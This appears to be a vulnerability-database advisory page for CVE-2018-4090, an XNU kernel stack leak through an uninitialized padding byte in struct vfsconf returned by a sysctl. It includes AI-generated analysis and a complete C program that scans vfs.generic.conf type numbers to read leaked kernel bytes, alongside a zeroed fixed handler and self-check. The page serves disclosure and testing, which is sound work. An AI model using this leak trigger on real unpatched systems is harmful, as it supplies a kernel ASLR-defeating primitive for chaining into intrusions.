VYPR
Unrated severity · NVD Advisory · Published Apr 3, 2018 · Updated Aug 5, 2024

CVE-2018-4090

Description

A kernel memory-read restriction bypass in Apple iOS, macOS, tvOS, and watchOS allows a crafted app to read protected kernel memory.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

CVE-2018-4090 is a kernel memory-read restriction bypass in the Kernel component of Apple iOS before 11.2.5, macOS before 10.13.3, tvOS before 11.2.5, and watchOS before 4.2.2. The vulnerability allows a crafted app to bypass intended memory-read restrictions, potentially exposing sensitive kernel memory. The issue is part of a set of vulnerabilities addressed in the January 23, 2018 security updates for all four operating systems [1][2][3][4].

Exploitation

Exploitation requires only the ability to run a crafted app on the device: the trigger is an ordinary `sysctl()` call made from an unprivileged process, so no elevated privileges and no network access are involved. Each call returns kernel memory that should have been zeroed before being copied to user space, and the app can repeat the call to sample more of it. Apple's advisory describes the issue only as a memory-read restriction bypass and does not detail the mechanism [1][2][3][4].

Impact

Successful exploitation gives the attacker read access to kernel memory that the kernel never intended to return. The amount leaked per call is small (stale kernel stack bytes rather than memory at a chosen address), so its practical value is as an information-leak primitive: sampled repeatedly, the leaked bytes can expose kernel stack contents such as pointer fragments that help defeat kernel ASLR or stage a second bug. On its own the flaw yields only read access, not code execution or modification of kernel memory; that requires chaining it with another vulnerability [1][2][3][4].

Mitigation

Apple released fixes in the following updates: iOS 11.2.5, macOS High Sierra 10.13.3 (and Security Update 2018-001 for Sierra and El Capitan), tvOS 11.2.5, and watchOS 4.2.2, all on January 23, 2018. Users should update to these versions or later. Apple lists no workaround for unpatched devices; the only mitigation is applying the update [1][2][3][4].

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 4

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"Uninitialized struct padding byte in `sysctl_vfs_generic_conf()` leaks kernel stack memory to user space."

Attack vector

An attacker with the ability to run a crafted app on the system calls `sysctl()` with the name `{ CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 }` to read a `struct vfsconf` [ref_id=1]; the fourth name component is the filesystem type number (`vfc_typenum`) that the handler looks up, and 0x17 is the one used in the reported trigger. The kernel copies the entire structure, including the uninitialized padding byte between `vfc_name` and `vfc_typenum`, to user space via `SYSCTL_OUT` [ref_id=1]. Because that padding byte is never zeroed, it leaks whatever kernel stack data happened to occupy that location, which is how the intended memory-read restrictions are bypassed [ref_id=1].

Affected code

The vulnerability is in the `sysctl_vfs_generic_conf()` function in the XNU kernel shared by macOS, iOS, tvOS and watchOS, which handles the `vfs.generic.conf.*` sysctls. The function fills a stack-allocated `struct vfsconf` field by field and then copies it to user space via `SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf))` [ref_id=1]. In `struct vfsconf` the `char vfc_name[MFSNAMELEN]` field (15 bytes) is followed by `int vfc_typenum`; because the `int` must be 4-byte aligned, the compiler inserts one padding byte between them, and that byte is never written before the whole structure is copied out [ref_id=1].

What the fix does

The advisory does not include a patch, but the root cause is clear: the `struct vfsconf` has a one-byte padding gap between `vfc_name` (15 bytes) and `vfc_typenum` (4-byte int) that is never initialized before the structure is copied to user space [ref_id=1]. The robust fix is to zero the entire `struct vfsconf` (e.g. `memset(&vfsc, 0, sizeof(vfsc))`) before populating its fields; zeroing only the known padding byte would also close this leak but breaks silently if the layout ever changes. Apple shipped a fix in iOS 11.2.5, macOS 10.13.3, tvOS 11.2.5, and watchOS 4.2.2.

Preconditions

  • input: Attacker must be able to execute a crafted app on the affected system
  • config: The sysctl vfs.generic.conf.* interface must be accessible (default on macOS/iOS)

Reproduction

Compile and run the following program on an affected macOS system (e.g., 10.13.0). Only the first line of the program survives on this page:

```c
#include
```
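The following complete program is an added reproduction and check for this CVE; it is not the page's own program and not Project Zero's proof of concept. It goes beyond the single type number 0x17 used in the attack-vector description: it queries `vfs.generic.conf.<typenum>` for every type number in an assumed range 0..255, pre-zeroes the user buffer so any nonzero byte at offset 19 provably came from the kernel, and reports it. It also carries a zero-initialized stand-in for the handler's copy-out (the fix described above) with a self-check on constructed input, so the layout arithmetic and the detector run on any system; the `struct vfsconf` mirror used off macOS, the function names, the "hfs"/17 sample values and the assumption that the kernel simply fails the call for an unregistered type number are all this example's own, not XNU code.

```c
/* Added example for CVE-2018-4090, not the page's truncated program and not
 * Project Zero's PoC. Shows the struct vfsconf layout with its single padding
 * byte, a zero-initialized stand-in for the copy-out the kernel handler should
 * have done, and, on macOS, a scan of vfs.generic.conf.<typenum> that reports
 * any nonzero padding byte the kernel returns. The stand-in handler and the
 * "hfs"/17 sample values are illustrative assumptions, not XNU code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __APPLE__
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mount.h>   /* struct vfsconf, CTL_VFS, VFS_GENERIC, VFS_CONF, MFSNAMELEN */
#else
/* Mirror of XNU's userland struct vfsconf (bsd/sys/mount.h) so the layout
 * checks and the stand-in handler also build elsewhere. */
#define MFSNAMELEN 15
struct vfsconf {
    uint32_t vfc_reserved1;
    char     vfc_name[MFSNAMELEN];   /* offsets 4..18 */
    int      vfc_typenum;            /* aligned to offset 20, so byte 19 is padding */
    int      vfc_refcount;
    int      vfc_flags;
    uint32_t vfc_reserved2;
    uint32_t vfc_reserved3;
};
#endif

/* The padding starts right after vfc_name and runs up to vfc_typenum. */
size_t vfsconf_pad_offset(void) { return offsetof(struct vfsconf, vfc_name) + MFSNAMELEN; }
size_t vfsconf_pad_len(void) { return offsetof(struct vfsconf, vfc_typenum) - vfsconf_pad_offset(); }

/* 1 if a raw copy-out carries a nonzero padding byte, i.e. bytes the kernel
 * never meant to return; a patched kernel always yields 0 here. */
int vfsconf_padding_leaked(const unsigned char *raw) {
    for (size_t i = vfsconf_pad_offset(); i < offsetof(struct vfsconf, vfc_typenum); i++)
        if (raw[i] != 0) return 1;
    return 0;
}

/* Hardened stand-in for sysctl_vfs_generic_conf(). The vulnerable handler
 * declared `struct vfsconf vfsc;` on the stack, wrote every named field and
 * handed the whole object to SYSCTL_OUT, so byte 19 went out untouched. The
 * memset is the missing step: zeroed first, no padding byte can carry stale stack data. */
void fixed_copyout(unsigned char *out, const char *fsname, int typenum) {
    struct vfsconf vfsc;
    size_t n = strlen(fsname) > MFSNAMELEN ? MFSNAMELEN : strlen(fsname);
    memset(&vfsc, 0, sizeof vfsc);
    memcpy(vfsc.vfc_name, fsname, n);     /* kernel: bcopy of MFSNAMELEN bytes */
    vfsc.vfc_typenum = typenum;
    memcpy(out, &vfsc, sizeof vfsc);      /* SYSCTL_OUT(req, &vfsc, sizeof vfsc) */
}

/* Constructed self-check: with caller garbage pre-filled in `out`, the fixed
 * handler returns a zero padding byte and intact fields, and the detector
 * flags the buffer once its padding byte is overwritten. Returns 1 on success. */
int fixed_handler_is_clean(void) {
    unsigned char out[sizeof(struct vfsconf)];
    int typenum;
    memset(out, 0xCC, sizeof out);
    fixed_copyout(out, "hfs", 17);        /* assumed sample name/typenum */
    memcpy(&typenum, out + offsetof(struct vfsconf, vfc_typenum), sizeof typenum);
    if (vfsconf_padding_leaked(out) || typenum != 17) return 0;
    if (memcmp(out + offsetof(struct vfsconf, vfc_name), "hfs", 4) != 0) return 0;
    out[vfsconf_pad_offset()] = 0x7f;     /* simulate one leaked stack byte */
    return vfsconf_padding_leaked(out);
}

#ifdef __APPLE__
/* Query the real kernel for vfs.generic.conf.<t>, t in [0, max_typenum]. The
 * buffer is pre-zeroed, so a nonzero padding byte provably came from the kernel;
 * unregistered type numbers fail and are skipped (assumed behaviour).
 * Returns the number of leaking responses, or -1 if nothing answered. */
int scan_vfs_generic_conf(int max_typenum) {
    int answered = 0, leaks = 0;
    for (int t = 0; t <= max_typenum; t++) {
        int name[4] = { CTL_VFS, VFS_GENERIC, VFS_CONF, t };
        unsigned char raw[sizeof(struct vfsconf)];
        size_t len = sizeof raw;
        memset(raw, 0, sizeof raw);
        if (sysctl(name, 4, raw, &len, NULL, 0) != 0 || len != sizeof raw)
            continue;
        answered++;
        int leaked = vfsconf_padding_leaked(raw);
        leaks += leaked;
        printf("typenum %3d %-15.15s padding byte 0x%02x%s\n", t,
               (const char *)raw + offsetof(struct vfsconf, vfc_name),
               raw[vfsconf_pad_offset()], leaked ? "  <-- kernel stack leak" : "");
    }
    return answered ? leaks : -1;
}
#endif

int main(void) {
    printf("fixed-handler self-check: %s\n", fixed_handler_is_clean() ? "ok" : "FAILED");
#ifdef __APPLE__
    int leaks = scan_vfs_generic_conf(255);
    if (leaks < 0) puts("no filesystem answered vfs.generic.conf");
    else printf("%d leaking response(s); expect 0 on macOS 10.13.3 or later\n", leaks);
#endif
    return 0;
}
```

Build with `cc -Wall -o vfsconf_leak vfsconf_leak.c && ./vfsconf_leak`. On an unpatched macOS the scan prints a nonzero byte for some responses (the leaked value varies from run to run because it is whatever sat on the kernel stack); on 10.13.3 or later every padding byte is 0x00. A single nonzero byte is conclusive because the user buffer was zeroed before the call and the kernel overwrites all 40 bytes.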

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 8

News mentions: 0 (no linked articles in our index yet)